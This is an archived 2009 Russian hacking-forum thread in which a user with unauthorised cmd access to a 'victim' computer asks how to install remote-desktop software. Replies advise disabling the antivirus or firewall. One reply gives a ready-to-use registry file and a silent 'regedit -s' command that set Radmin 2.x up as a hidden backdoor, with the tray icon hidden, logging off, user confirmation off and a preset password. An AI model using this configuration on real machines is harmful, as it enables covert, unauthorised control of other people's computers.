Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Cmd Доступ (https://forum.antichat.xyz/showthread.php?t=138263)

5rap 30.08.2009 08:38

Cmd Доступ
 
Здравствуйте.У меня такая проблемка.Я получил cmd доступ к удалённому компьютеру но не как не могу поставить удаленный рабочий стол...Пробовал r_server и VNC...Заливал их туда через ftp.Но радмин не работал а в VNC пишет что ввожу не тот пасс...Может кто-то подскажет еще какой нибудь софт для удалённого администрирования.Заранее благодарен.

Alexandr II 30.08.2009 08:48

может антивирус или фаервол блокирует?) отключить попробуй) или удалить) а потом уже и радмином воспользоваться)

5rap 30.08.2009 09:09

Та вроде нет...в процессах посмотрел вроде бы ничего нету...А радмин у меня какбы начинает загрузку (даже не требуя пароля) пишет Install Screen и сразу же исчезает.Даже раб стол не успевает загурзить...

Guron_18 30.08.2009 09:12

Кинь ему по фтп файл name.reg с содержанием
Код:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

И запусти его regedit -s name.reg
Это даст тебе пароль на радмин 123456789, скроет значок и т.д.....

5rap 30.08.2009 09:16

это для 2.0 радмина?

Guron_18 30.08.2009 09:23

Да для 2.х

5rap 30.08.2009 09:32

сейчас опробую...

Guron_18 30.08.2009 09:36

з.ы только пробелы по убирай

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:"Parameter"=hex:38,70,e3,b9,f6,f4, fb,9e,f8,9c,77,92,11,f4,ce, 1a

eNergy 30.08.2009 09:37

интересно получилось нет ?

Guron_18 30.08.2009 09:44

У меня была проблема о которой ты говорил, что радмин открывается и сразу закрывается когда на жертве радмин был запущен на одном пользователе, а сам он работал на другой учетке. это я уже незнаю как обойти...


Время: 21:20